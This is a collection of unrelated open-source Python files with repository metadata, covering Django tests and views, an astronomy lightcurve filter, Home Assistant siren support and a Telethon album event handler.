text stringlengths 4 1.02M | meta dict |
|---|---|
import copy
import os
from io import StringIO
from unittest.mock import MagicMock
from django.core.management import call_command
from django.test import TestCase
from data_refinery_common.models import (
OriginalFile,
ProcessorJobOriginalFileAssociation,
SurveyJob,
ProcessorJob,
Sample,
OriginalFileSampleAssociation,
Organism
)
from django.utils import timezone
from data_refinery_workers.processors import utils
def prepare_job():
pj = ProcessorJob()
pj.pipeline_applied = "AFFY_TO_PCL"
pj.save()
original_file = OriginalFile()
original_file.source_filename = "ftp://ftp.ebi.ac.uk/pub/databases/microarray/data/experiment/GEOD/E-GEOD-59071/E-GEOD-59071.raw.3.zip"
original_file.filename = "GSM1426071_CD_colon_active_1.CEL"
original_file.absolute_file_path = "/home/user/data_store/raw/TEST/CEL/GSM1426071_CD_colon_active_1.CEL"
original_file.save()
assoc1 = ProcessorJobOriginalFileAssociation()
assoc1.original_file = original_file
assoc1.processor_job = pj
assoc1.save()
c_elegans = Organism.get_object_for_name("CAENORHABDITIS_ELEGANS")
sample = Sample()
sample.title = "Heyo"
sample.organism = c_elegans
sample.is_processed = False
sample.save()
ogsa = OriginalFileSampleAssociation()
ogsa.sample = sample
ogsa.original_file = original_file
ogsa.save()
return pj
class StartJobTestCase(TestCase):
def test_success(self):
processor_job = prepare_job()
job_context = utils.start_job({"job": processor_job})
# start_job preserves the "job" key
self.assertEqual(job_context["job"], processor_job)
job_context['success'] = True
job_context = utils.end_job(job_context)
for sample in job_context['samples']:
self.assertTrue(sample.is_processed)
def test_failure(self):
"""Fails because there are no files for the job."""
processor_job = ProcessorJob()
processor_job.save()
job_context = utils.start_job({"job": processor_job})
self.assertFalse(job_context["success"])
def test_bad_restart(self):
with self.settings(RUNNING_IN_CLOUD=True):
job = ProcessorJob()
job.start_time = timezone.now()
job.success = True
job.save()
job_context = utils.start_job({"job": job})
job = ProcessorJob()
job.start_time = timezone.now()
job.success = False
job.save()
job_context = utils.start_job({"job": job})
self.assertRaises(utils.start_job({"job": job}))
class RunPipelineTestCase(TestCase):
def test_no_job(self):
mock_processor = MagicMock()
utils.run_pipeline({"job_id": 100}, [mock_processor])
mock_processor.assert_not_called()
def test_processor_failure(self):
processor_job = ProcessorJob()
processor_job.save()
job_context = {"job_id": processor_job.id,
"job": processor_job,
"batches": []}
mock_processor = MagicMock()
mock_processor.__name__ = "Fake processor."
return_context = copy.copy(job_context)
return_context["success"] = False
mock_processor.return_value = return_context
utils.run_pipeline(job_context, [mock_processor])
self.assertEqual(mock_processor.call_count, 1)
processor_job.refresh_from_db()
self.assertFalse(processor_job.success)
self.assertIsNotNone(processor_job.end_time)
| {
"content_hash": "fa5a827eb5f87fe1388e7c3458183873",
"timestamp": "",
"source": "github",
"line_count": 115,
"max_line_length": 139,
"avg_line_length": 31.182608695652174,
"alnum_prop": 0.6427774679308421,
"repo_name": "data-refinery/data_refinery",
"id": "5201a853b9230711b63ef9d51e32ba27c6702823",
"size": "3586",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "workers/data_refinery_workers/processors/test_utils.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HCL",
"bytes": "15276"
},
{
"name": "Python",
"bytes": "307545"
},
{
"name": "R",
"bytes": "4988"
},
{
"name": "Shell",
"bytes": "9338"
}
],
"symlink_target": ""
} |
import scipy.signal as signal
import scipy.interpolate as interpolate
import pylab as pl
import astronomy as ast
import os
import string
os.system('ls -l')
filename = raw_input('Open which file ? : ')
os.system('less %s' % filename)
cols = string.split(raw_input('Use which columns ? : '))
# load a lightcurve
X = pl.load(filename)
x = X[:,int(cols[0])-1]
y = 10**(X[:,int(cols[1])-1]/(-2.5))
y /= pl.average(y)
#y = X[:,int(cols[1])-1]
# we must interpolate this lightcurve to the minimum time spacing throughout
xnew,ynew = ast.signal.resample(x,y)
# subtract the first magnitude from lightcurve to avoid funny edge effects
ynew -= ynew[0]
dt = xnew[1]-xnew[0]
# now create filter coefficients
# filter parameters
fp = 500.0
fs = 400.0
wp = fp*pl.pi*dt*2.0/pl.pi
ws = fs*pl.pi*dt*2.0/pl.pi
gpass = 0.1
gstop = 20
ftype = 'cheby1'
#print wp
#print ws
# calculate filter coefficients and filter the lightcurve
b,a = signal.iirdesign(wp,ws,gpass,gstop,ftype=ftype)
yf = signal.lfilter(b,a,ynew)
yesno = raw_input('Plot results [y] ?')
if yesno == 'y' or yesno =='Y' or yesno == '':
# plot some stuff
pl.figure(figsize=(9,12))
pl.subplot(411)
pl.plot(xnew,yf,'.')
#yl = pl.ylim()
#pl.ylim(yl[1],yl[0])
pl.subplot(412)
pl.plot(xnew,ynew,'.')
#yl = pl.ylim()
#pl.ylim(yl[1],yl[0])
pl.subplot(413)
freq,amp = ast.signal.dft(xnew,yf,0,0.5/dt,1)
pl.plot(freq,amp)
pl.subplot(414)
w,h = signal.freqs(b,a)
pl.plot(w,h)
pl.show()
# save lightcurve
temp = []
temp.append(xnew)
temp.append(yf)
temp.append(ynew-yf)
outfilename = string.strip(raw_input('Enter output filename [%s_FF.dat] : ' % filename[:-4]))
if outfilename == '':
filename = '%s_FF.dat' % filename[:-4]
else:
filename = outfilename
print 'Saving to %s' % filename
pl.save(filename,pl.array(temp).transpose())
| {
"content_hash": "e5ec3e4f0c58cf7fa3ce6f56c50355e5",
"timestamp": "",
"source": "github",
"line_count": 87,
"max_line_length": 93,
"avg_line_length": 21.57471264367816,
"alnum_prop": 0.6435801811401172,
"repo_name": "ezietsman/msc-thesis",
"id": "6acb90c9f8f0cebcab268901133087549b89fe0f",
"size": "1936",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "z_cha/flatten.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "246700"
}
],
"symlink_target": ""
} |
import pyaf.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 32 , FREQ = 'D', seed = 0, trendtype = "MovingMedian", cycle_length = 0, transform = "Integration", sigma = 0.0, exog_count = 0, ar_order = 12); | {
"content_hash": "7e48aa427d25264722cae7ae6a09eb29",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 168,
"avg_line_length": 38.285714285714285,
"alnum_prop": 0.7089552238805971,
"repo_name": "antoinecarme/pyaf",
"id": "cacbabfbe9d24e7b268f7b98fca9c8703ffbecdd",
"size": "268",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/artificial/transf_Integration/trend_MovingMedian/cycle_0/ar_12/test_artificial_32_Integration_MovingMedian_0_12_0.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "6773299"
},
{
"name": "Procfile",
"bytes": "24"
},
{
"name": "Python",
"bytes": "54209093"
},
{
"name": "R",
"bytes": "807"
},
{
"name": "Shell",
"bytes": "3619"
}
],
"symlink_target": ""
} |
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse, HttpResponseBadRequest,\
HttpResponseForbidden
from bootcamp.feeds.models import Feed
from bootcamp.activities.models import Activity
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.template.loader import render_to_string
from django.template.context_processors import csrf
import json
from django.contrib.auth.decorators import login_required
from bootcamp.decorators import ajax_required
FEEDS_NUM_PAGES = 10
@login_required
def feeds(request):
print "feeds views"
all_feeds = Feed.get_feeds()
paginator = Paginator(all_feeds, FEEDS_NUM_PAGES)
feeds = paginator.page(1)
print feeds
from_feed = -1
if feeds:
from_feed = feeds[0].id
return render(request, 'feeds/feeds.html', {
'feeds': feeds,
'from_feed': from_feed,
'page': 1,
})
def feed(request, pk):
feed = get_object_or_404(Feed, pk=pk)
return render(request, 'feeds/feed.html', {'feed': feed})
@login_required
@ajax_required
def load(request):
from_feed = request.GET.get('from_feed')
page = request.GET.get('page')
feed_source = request.GET.get('feed_source')
all_feeds = Feed.get_feeds(from_feed)
if feed_source != 'all':
all_feeds = all_feeds.filter(user__id=feed_source)
paginator = Paginator(all_feeds, FEEDS_NUM_PAGES)
try:
feeds = paginator.page(page)
except PageNotAnInteger:
return HttpResponseBadRequest()
except EmptyPage:
feeds = []
html = u''
csrf_token = unicode(csrf(request)['csrf_token'])
for feed in feeds:
html = u'{0}{1}'.format(html,
render_to_string('feeds/partial_feed.html',
{
'feed': feed,
'user': request.user,
'csrf_token': csrf_token
}))
return HttpResponse(html)
def _html_feeds(last_feed, user, csrf_token, feed_source='all'):
feeds = Feed.get_feeds_after(last_feed)
if feed_source != 'all':
feeds = feeds.filter(user__id=feed_source)
html = u''
for feed in feeds:
html = u'{0}{1}'.format(html,
render_to_string('feeds/partial_feed.html',
{
'feed': feed,
'user': user,
'csrf_token': csrf_token
}))
return html
@login_required
@ajax_required
def load_new(request):
last_feed = request.GET.get('last_feed')
user = request.user
csrf_token = unicode(csrf(request)['csrf_token'])
html = _html_feeds(last_feed, user, csrf_token)
return HttpResponse(html)
@login_required
@ajax_required
def check(request):
last_feed = request.GET.get('last_feed')
feed_source = request.GET.get('feed_source')
feeds = Feed.get_feeds_after(last_feed)
if feed_source != 'all':
feeds = feeds.filter(user__id=feed_source)
count = feeds.count()
return HttpResponse(count)
@login_required
@ajax_required
def post(request):
last_feed = request.POST.get('last_feed')
user = request.user
csrf_token = unicode(csrf(request)['csrf_token'])
feed = Feed()
feed.user = user
post = request.POST['post']
post = post.strip()
if len(post) > 0:
feed.post = post[:255]
feed.save()
html = _html_feeds(last_feed, user, csrf_token)
return HttpResponse(html)
@login_required
@ajax_required
def like(request):
feed_id = request.POST['feed']
feed = Feed.objects.get(pk=feed_id)
user = request.user
like = Activity.objects.filter(activity_type=Activity.LIKE, feed=feed_id,
user=user)
if like:
user.profile.unotify_liked(feed)
like.delete()
else:
like = Activity(activity_type=Activity.LIKE, feed=feed_id, user=user)
like.save()
user.profile.notify_liked(feed)
return HttpResponse(feed.calculate_likes())
@login_required
@ajax_required
def comment(request):
if request.method == 'POST':
feed_id = request.POST['feed']
feed = Feed.objects.get(pk=feed_id)
post = request.POST['post']
post = post.strip()
if len(post) > 0:
post = post[:255]
user = request.user
feed.comment(user=user, post=post)
user.profile.notify_commented(feed)
user.profile.notify_also_commented(feed)
return render(request, 'feeds/partial_feed_comments.html',
{'feed': feed})
else:
feed_id = request.GET.get('feed')
feed = Feed.objects.get(pk=feed_id)
return render(request, 'feeds/partial_feed_comments.html',
{'feed': feed})
@login_required
@ajax_required
def update(request):
first_feed = request.GET.get('first_feed')
last_feed = request.GET.get('last_feed')
feed_source = request.GET.get('feed_source')
feeds = Feed.get_feeds().filter(id__range=(last_feed, first_feed))
if feed_source != 'all':
feeds = feeds.filter(user__id=feed_source)
dump = {}
for feed in feeds:
dump[feed.pk] = {'likes': feed.likes, 'comments': feed.comments}
data = json.dumps(dump)
return HttpResponse(data, content_type='application/json')
@login_required
@ajax_required
def track_comments(request):
feed_id = request.GET.get('feed')
feed = Feed.objects.get(pk=feed_id)
return render(request, 'feeds/partial_feed_comments.html', {'feed': feed})
@login_required
@ajax_required
def remove(request):
try:
feed_id = request.POST.get('feed')
feed = Feed.objects.get(pk=feed_id)
if feed.user == request.user:
likes = feed.get_likes()
parent = feed.parent
for like in likes:
like.delete()
feed.delete()
if parent:
parent.calculate_comments()
return HttpResponse()
else:
return HttpResponseForbidden()
except Exception, e:
return HttpResponseBadRequest()
| {
"content_hash": "8c192b358af620e815cc2c70bce5768a",
"timestamp": "",
"source": "github",
"line_count": 211,
"max_line_length": 78,
"avg_line_length": 30.924170616113745,
"alnum_prop": 0.5750191570881226,
"repo_name": "okwow123/freebaram",
"id": "a64f8ce9196cb0799dd4b140c724cfc4776b87d8",
"size": "6525",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bootcamp/feeds/views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "10357"
},
{
"name": "HTML",
"bytes": "63691"
},
{
"name": "JavaScript",
"bytes": "101494"
},
{
"name": "Python",
"bytes": "99135"
},
{
"name": "Shell",
"bytes": "72"
}
],
"symlink_target": ""
} |
import os
import sys
import requests
import hashlib
import json
class download_if_changed(object):
def process(self,input,output,url,filename):
data = requests.get(url).content
data_hash = hashlib.md5(data).hexdigest()
current = ""
try:
current = file(filename).read()
except:
pass
current_hash = hashlib.md5(current).hexdigest()
if current_hash != data_hash:
file(filename,'w').write(data)
file(output,'w').write('OK')
| {
"content_hash": "3e9b93b877c9c2c9a99d75cd40b31203",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 55,
"avg_line_length": 27.63157894736842,
"alnum_prop": 0.6,
"repo_name": "OpenBudget/open-budget-data",
"id": "c77e77dc8e04498fea3c9c37bc72e93fb014381e",
"size": "542",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "processors/download_if_changed.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "16595226"
},
{
"name": "Python",
"bytes": "309862"
}
],
"symlink_target": ""
} |
from datetime import datetime
from django.db import models
from django.utils.http import urlquote
attachment_url_format = 'https://www.ccxp.nthu.edu.tw/ccxp/INQUIRE/JH/output/6_6.1_6.1.12/%s.pdf' # noqa
class Course(models.Model):
"""Course database schema"""
no = models.CharField(max_length=20, unique=True, db_index=True)
code = models.CharField(max_length=20, blank=True)
eng_title = models.CharField(max_length=200, blank=True)
chi_title = models.CharField(max_length=200, blank=True)
note = models.TextField(blank=True)
objective = models.CharField(max_length=80, blank=True)
time = models.CharField(max_length=20, blank=True)
time_token = models.CharField(max_length=20, blank=True)
teacher = models.CharField(max_length=40, blank=True) # Only save Chinese
room = models.CharField(max_length=80, blank=True)
credit = models.IntegerField(default=0)
limit = models.IntegerField(default=0)
prerequisite = models.BooleanField(default=False, blank=True)
ys = models.CharField(max_length=10, blank=True)
ge = models.CharField(max_length=80, blank=True)
hit = models.IntegerField(default=0)
syllabus = models.TextField(blank=True) # pure text
has_attachment = models.BooleanField(default=False) # has pdf
def __str__(self):
return self.no
@property
def attachment_url(self):
return attachment_url_format % urlquote(self.no)
class Department(models.Model):
dept_name = models.CharField(max_length=20, blank=True)
required_course = models.ManyToManyField(Course, blank=True)
ys = models.CharField(max_length=10, blank=True)
def __unicode__(self):
return self.dept_name
class Announcement(models.Model):
TAG_CHOICE = (
('Info', '公告'),
('Bug', '已知問題'),
('Fix', '問題修復'),
)
content = models.TextField(blank=True)
time = models.DateTimeField(default=datetime.now)
tag = models.CharField(max_length=10, choices=TAG_CHOICE, default='Info')
def __unicode__(self):
return '%s|%s' % (self.time, self.tag)
class FlatPrerequisite(models.Model):
'''
store rendered prerequisite in the database
alternative: django.contrib.flatpage
'''
updated_at = models.DateTimeField(auto_now=True)
html = models.TextField()
@classmethod
def update_html(cls, html):
if cls.objects.exists():
ins = cls.objects.get()
ins.html = html
ins.save()
return ins
else:
return cls.objects.create(html=html)
| {
"content_hash": "5767f11af7351c87624a1e0480c00bbc",
"timestamp": "",
"source": "github",
"line_count": 80,
"max_line_length": 105,
"avg_line_length": 32.25,
"alnum_prop": 0.6655038759689923,
"repo_name": "leVirve/NTHU_Course",
"id": "1d9d8c957b9a6a117c45a6b6a1b92f637e51b0f0",
"size": "2625",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "data_center/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "61977"
},
{
"name": "HTML",
"bytes": "35840"
},
{
"name": "JavaScript",
"bytes": "16495"
},
{
"name": "Python",
"bytes": "57040"
},
{
"name": "Shell",
"bytes": "17"
}
],
"symlink_target": ""
} |
"""Support for RFXtrx sirens."""
from __future__ import annotations
from typing import Any
import RFXtrx as rfxtrxmod
from homeassistant.components.siren import (
SUPPORT_TONES,
SUPPORT_TURN_OFF,
SUPPORT_TURN_ON,
SirenEntity,
)
from homeassistant.components.siren.const import ATTR_TONE
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import CALLBACK_TYPE, HomeAssistant, callback
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.event import async_call_later
from . import (
DEFAULT_OFF_DELAY,
DeviceTuple,
RfxtrxCommandEntity,
async_setup_platform_entry,
)
from .const import CONF_OFF_DELAY
SUPPORT_RFXTRX = SUPPORT_TURN_ON | SUPPORT_TONES
SECURITY_PANIC_ON = "Panic"
SECURITY_PANIC_OFF = "End Panic"
SECURITY_PANIC_ALL = {SECURITY_PANIC_ON, SECURITY_PANIC_OFF}
def supported(event: rfxtrxmod.RFXtrxEvent):
"""Return whether an event supports sirens."""
device = event.device
if isinstance(device, rfxtrxmod.ChimeDevice):
return True
if isinstance(device, rfxtrxmod.SecurityDevice) and isinstance(
event, rfxtrxmod.SensorEvent
):
if event.values["Sensor Status"] in SECURITY_PANIC_ALL:
return True
return False
def get_first_key(data: dict[int, str], entry: str) -> int:
"""Find a key based on the items value."""
return next((key for key, value in data.items() if value == entry))
async def async_setup_entry(
hass: HomeAssistant,
config_entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
) -> None:
"""Set up config entry."""
def _constructor(
event: rfxtrxmod.RFXtrxEvent,
auto: rfxtrxmod.RFXtrxEvent | None,
device_id: DeviceTuple,
entity_info: dict,
):
"""Construct a entity from an event."""
device = event.device
if isinstance(device, rfxtrxmod.ChimeDevice):
return [
RfxtrxChime(
event.device,
device_id,
entity_info.get(CONF_OFF_DELAY, DEFAULT_OFF_DELAY),
auto,
)
]
if isinstance(device, rfxtrxmod.SecurityDevice) and isinstance(
event, rfxtrxmod.SensorEvent
):
if event.values["Sensor Status"] in SECURITY_PANIC_ALL:
return [
RfxtrxSecurityPanic(
event.device,
device_id,
entity_info.get(CONF_OFF_DELAY, DEFAULT_OFF_DELAY),
auto,
)
]
await async_setup_platform_entry(
hass, config_entry, async_add_entities, supported, _constructor
)
class RfxtrxOffDelayMixin(Entity):
"""Mixin to support timeouts on data.
Many 433 devices only send data when active. They will
repeatedly (every x seconds) send a command to indicate
being active and stop sending this command when inactive.
This mixin allow us to keep track of the timeout once
they go inactive.
"""
_timeout: CALLBACK_TYPE | None = None
_off_delay: float | None = None
def _setup_timeout(self):
@callback
def _done(_):
self._timeout = None
self.async_write_ha_state()
if self._off_delay:
self._timeout = async_call_later(self.hass, self._off_delay, _done)
def _cancel_timeout(self):
if self._timeout:
self._timeout()
self._timeout = None
class RfxtrxChime(RfxtrxCommandEntity, SirenEntity, RfxtrxOffDelayMixin):
"""Representation of a RFXtrx chime."""
_device: rfxtrxmod.ChimeDevice
def __init__(self, device, device_id, off_delay=None, event=None):
"""Initialize the entity."""
super().__init__(device, device_id, event)
self._attr_available_tones = list(self._device.COMMANDS.values())
self._attr_supported_features = SUPPORT_TURN_ON | SUPPORT_TONES
self._default_tone = next(iter(self._device.COMMANDS))
self._off_delay = off_delay
@property
def is_on(self):
"""Return true if device is on."""
return self._timeout is not None
async def async_turn_on(self, **kwargs):
"""Turn the device on."""
self._cancel_timeout()
if tone := kwargs.get(ATTR_TONE):
command = get_first_key(self._device.COMMANDS, tone)
else:
command = self._default_tone
await self._async_send(self._device.send_command, command)
self._setup_timeout()
self.async_write_ha_state()
def _apply_event(self, event: rfxtrxmod.ControlEvent):
"""Apply a received event."""
super()._apply_event(event)
sound = event.values.get("Sound")
if sound is not None:
self._cancel_timeout()
self._setup_timeout()
@callback
def _handle_event(self, event, device_id):
"""Check if event applies to me and update."""
if self._event_applies(event, device_id):
self._apply_event(event)
self.async_write_ha_state()
class RfxtrxSecurityPanic(RfxtrxCommandEntity, SirenEntity, RfxtrxOffDelayMixin):
"""Representation of a security device."""
_device: rfxtrxmod.SecurityDevice
def __init__(self, device, device_id, off_delay=None, event=None):
"""Initialize the entity."""
super().__init__(device, device_id, event)
self._attr_supported_features = SUPPORT_TURN_ON | SUPPORT_TURN_OFF
self._on_value = get_first_key(self._device.STATUS, SECURITY_PANIC_ON)
self._off_value = get_first_key(self._device.STATUS, SECURITY_PANIC_OFF)
self._off_delay = off_delay
@property
def is_on(self):
"""Return true if device is on."""
return self._timeout is not None
async def async_turn_on(self, **kwargs: Any):
"""Turn the device on."""
self._cancel_timeout()
await self._async_send(self._device.send_status, self._on_value)
self._setup_timeout()
self.async_write_ha_state()
async def async_turn_off(self, **kwargs: Any) -> None:
"""Turn the device off."""
self._cancel_timeout()
await self._async_send(self._device.send_status, self._off_value)
self.async_write_ha_state()
def _apply_event(self, event: rfxtrxmod.SensorEvent):
"""Apply a received event."""
super()._apply_event(event)
status = event.values.get("Sensor Status")
if status == SECURITY_PANIC_ON:
self._cancel_timeout()
self._setup_timeout()
elif status == SECURITY_PANIC_OFF:
self._cancel_timeout()
@callback
def _handle_event(self, event, device_id):
"""Check if event applies to me and update."""
if self._event_applies(event, device_id):
self._apply_event(event)
self.async_write_ha_state()
| {
"content_hash": "2d2818c272def90480d35973f5c5b81b",
"timestamp": "",
"source": "github",
"line_count": 234,
"max_line_length": 81,
"avg_line_length": 30.286324786324787,
"alnum_prop": 0.6160575701989558,
"repo_name": "GenericStudent/home-assistant",
"id": "9a4a475998da378253c1095388374a484474203c",
"size": "7087",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "homeassistant/components/rfxtrx/siren.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "3070"
},
{
"name": "Python",
"bytes": "44491729"
},
{
"name": "Shell",
"bytes": "5092"
}
],
"symlink_target": ""
} |
"""
Conjunto de modelos relacionais para o controle da app (Usuarios, auditorias, logs, etc)
Os modelos do catálogo do OPAC (periódicos, números, artigos) estão definidos na
lib: opac_schema (ver requirements.txt)
"""
import os
from sqlalchemy.event import listens_for
from sqlalchemy.ext.hybrid import hybrid_property
from sqlalchemy_utils.types.choice import ChoiceType
from werkzeug.security import generate_password_hash, check_password_hash
from flask_login import UserMixin
from flask import current_app
from webapp.utils import thumbgen_filename
from . import dbsql as db
from . import login_manager
from . import notifications
LANGUAGES_CHOICES = [
('pt', 'Português'),
('en', 'English'),
('es', 'Español'),
]
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
email = db.Column(db.String(120), nullable=False, unique=True)
_password = db.Column(db.String(128), nullable=True) # deve ser possível add novo user sem setar senha
email_confirmed = db.Column(db.Boolean, nullable=False, default=False)
@hybrid_property
def password(self):
return self._password
@password.setter
def _set_password(self, plaintext):
self._password = generate_password_hash(plaintext)
def is_correct_password(self, plaintext):
"""
Compara a string ``plaintext`` com a senha "hasheada" armazenada para este usuário.
"""
if not self._password:
return False
else:
return check_password_hash(self._password, plaintext)
def send_confirmation_email(self):
if not self._check_valid_email():
raise ValueError('Usuário deve ter email válido para realizar o envío')
else:
return notifications.send_confirmation_email(self.email)
def send_reset_password_email(self):
if not self._check_valid_email():
raise ValueError('Usuário deve ter email válido para realizar o envío')
else:
return notifications.send_reset_password_email(self.email)
def _check_valid_email(self):
"""
retorna True quando a instância (self) do usuário, tem um email válido.
retorna False em outro caso.
"""
from webapp.admin.forms import EmailForm
if not self.email or self.email == '' or self.email == '':
return False
else:
form = EmailForm(data={'email': self.email})
return form.validate()
# Required for administrative interface
def __unicode__(self):
return self.email
@login_manager.user_loader
def load_user(user_id):
"""
Retora usuário pelo id.
Necessário para o login manager.
"""
return User.query.get(int(user_id))
class File(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.Unicode(64), nullable=False)
path = db.Column(db.Unicode(256), nullable=False)
language = db.Column(ChoiceType(LANGUAGES_CHOICES), nullable=True)
def __unicode__(self):
return self.name
@property
def get_absolute_url(self):
media_url = current_app.config['MEDIA_URL']
return '%s/%s' % (media_url, self.path)
# Delete hooks: remove arquivos quando o modelo é apagado
@listens_for(File, 'after_delete')
def delelte_file_hook(mapper, connection, target):
if target.path:
media_root = current_app.config['MEDIA_ROOT']
try:
os.remove(os.path.join(media_root, target.path))
except OSError:
pass # Se der erro não importa, o arquivo já não existe
class Image(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.Unicode(64), nullable=False)
path = db.Column(db.Unicode(256), nullable=False)
language = db.Column(ChoiceType(LANGUAGES_CHOICES), nullable=True)
def __unicode__(self):
return self.name
@property
def get_absolute_url(self):
media_url = current_app.config['MEDIA_URL']
return '%s/%s' % (media_url, self.path)
@property
def get_thumbnail_absolute_url(self):
media_url = current_app.config['MEDIA_URL']
thumb_path = thumbgen_filename(self.path)
return '%s/%s' % (media_url, thumb_path)
# Delete hooks: remove arquivos quando o modelo é apagado
@listens_for(Image, 'after_delete')
def delelte_image_hook(mapper, connection, target):
if target.path:
media_root = current_app.config['MEDIA_ROOT']
# Remover a imagem
try:
os.remove(os.path.join(media_root, target.path))
except OSError:
pass # Se der erro não importa, o arquivo já não existe
# Remover o thumbnail
try:
thumb_path = thumbgen_filename(target.path)
os.remove(os.path.join(media_root, thumb_path))
except OSError:
pass # Se der erro não importa, o arquivo já não existe
| {
"content_hash": "d69c73d6abb9992e04d8d9b0abbd45fc",
"timestamp": "",
"source": "github",
"line_count": 150,
"max_line_length": 107,
"avg_line_length": 32.973333333333336,
"alnum_prop": 0.6502224019409624,
"repo_name": "jamilatta/opac",
"id": "a6e8a0b020c57cb18ec97a1cf8ac8df17134568e",
"size": "4993",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "opac/webapp/models.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "3802"
},
{
"name": "HTML",
"bytes": "161613"
},
{
"name": "JavaScript",
"bytes": "572996"
},
{
"name": "Makefile",
"bytes": "4437"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "536490"
}
],
"symlink_target": ""
} |
import time
from .common import EventBuilder, EventCommon, name_inner_event
from .. import utils
from ..tl import types
from ..tl.custom.sendergetter import SenderGetter
_IGNORE_MAX_SIZE = 100 # len()
_IGNORE_MAX_AGE = 5 # seconds
# IDs to ignore, and when they were added. If it grows too large, we will
# remove old entries. Although it should generally not be bigger than 10,
# it may be possible some updates are not processed and thus not removed.
_IGNORE_DICT = {}
@name_inner_event
class Album(EventBuilder):
"""
Occurs whenever you receive an album. This event only exists
to ease dealing with an unknown amount of messages that belong
to the same album.
Example
.. code-block:: python
from telethon import events
@client.on(events.Album)
async def handler(event):
# Counting how many photos or videos the album has
print('Got an album with', len(event), 'items')
# Forwarding the album as a whole to some chat
event.forward_to(chat)
# Printing the caption
print(event.text)
# Replying to the fifth item in the album
await event.messages[4].reply('Cool!')
"""
def __init__(
self, chats=None, *, blacklist_chats=False, func=None):
super().__init__(chats, blacklist_chats=blacklist_chats, func=func)
@classmethod
def build(cls, update, others=None, self_id=None):
if not others:
return # We only care about albums which come inside the same Updates
if isinstance(update,
(types.UpdateNewMessage, types.UpdateNewChannelMessage)):
if not isinstance(update.message, types.Message):
return # We don't care about MessageService's here
group = update.message.grouped_id
if group is None:
return # It must be grouped
# Check whether we are supposed to skip this update, and
# if we do also remove it from the ignore list since we
# won't need to check against it again.
if _IGNORE_DICT.pop(id(update), None):
return
# Check if the ignore list is too big, and if it is clean it
now = time.time()
if len(_IGNORE_DICT) > _IGNORE_MAX_SIZE:
for i in [i for i, t in _IGNORE_DICT.items() if now - t > _IGNORE_MAX_AGE]:
del _IGNORE_DICT[i]
# Add the other updates to the ignore list
for u in others:
if u is not update:
_IGNORE_DICT[id(u)] = now
# Figure out which updates share the same group and use those
return cls.Event([
u.message for u in others
if (isinstance(u, (types.UpdateNewMessage, types.UpdateNewChannelMessage))
and isinstance(u.message, types.Message)
and u.message.grouped_id == group)
])
class Event(EventCommon, SenderGetter):
"""
Represents the event of a new album.
Members:
messages (Sequence[`Message <telethon.tl.custom.message.Message>`]):
The list of messages belonging to the same album.
"""
def __init__(self, messages):
message = messages[0]
if not message.out and isinstance(message.to_id, types.PeerUser):
# Incoming message (e.g. from a bot) has to_id=us, and
# from_id=bot (the actual "chat" from a user's perspective).
chat_peer = types.PeerUser(message.from_id)
else:
chat_peer = message.to_id
super().__init__(chat_peer=chat_peer,
msg_id=message.id, broadcast=bool(message.post))
SenderGetter.__init__(self, message.sender_id)
self.messages = messages
def _set_client(self, client):
super()._set_client(client)
self._sender, self._input_sender = utils._get_entity_pair(
self.sender_id, self._entities, client._entity_cache)
for msg in self.messages:
msg._finish_init(client, self._entities, None)
@property
def grouped_id(self):
"""
The shared ``grouped_id`` between all the messages.
"""
return self.messages[0].grouped_id
@property
def text(self):
"""
The message text of the first photo with a caption,
formatted using the client's default parse mode.
"""
return next((m.text for m in self.messages if m.text), '')
@property
def raw_text(self):
"""
The raw message text of the first photo
with a caption, ignoring any formatting.
"""
return next((m.raw_text for m in self.messages if m.raw_text), '')
@property
def is_reply(self):
"""
`True` if the album is a reply to some other message.
Remember that you can access the ID of the message
this one is replying to through `reply_to_msg_id`,
and the `Message` object with `get_reply_message()`.
"""
# Each individual message in an album all reply to the same message
return self.messages[0].is_reply
@property
def forward(self):
"""
The `Forward <telethon.tl.custom.forward.Forward>`
information for the first message in the album if it was forwarded.
"""
# Each individual message in an album all reply to the same message
return self.messages[0].forward
# endregion Public Properties
# region Public Methods
async def get_reply_message(self):
"""
The `Message <telethon.tl.custom.message.Message>`
that this album is replying to, or `None`.
The result will be cached after its first use.
"""
return await self.messages[0].get_reply_message()
async def respond(self, *args, **kwargs):
"""
Responds to the album (not as a reply). Shorthand for
`telethon.client.messages.MessageMethods.send_message`
with ``entity`` already set.
"""
return await self.messages[0].respond(*args, **kwargs)
async def reply(self, *args, **kwargs):
"""
Replies to the first photo in the album (as a reply). Shorthand
for `telethon.client.messages.MessageMethods.send_message`
with both ``entity`` and ``reply_to`` already set.
"""
return await self.messages[0].reply(*args, **kwargs)
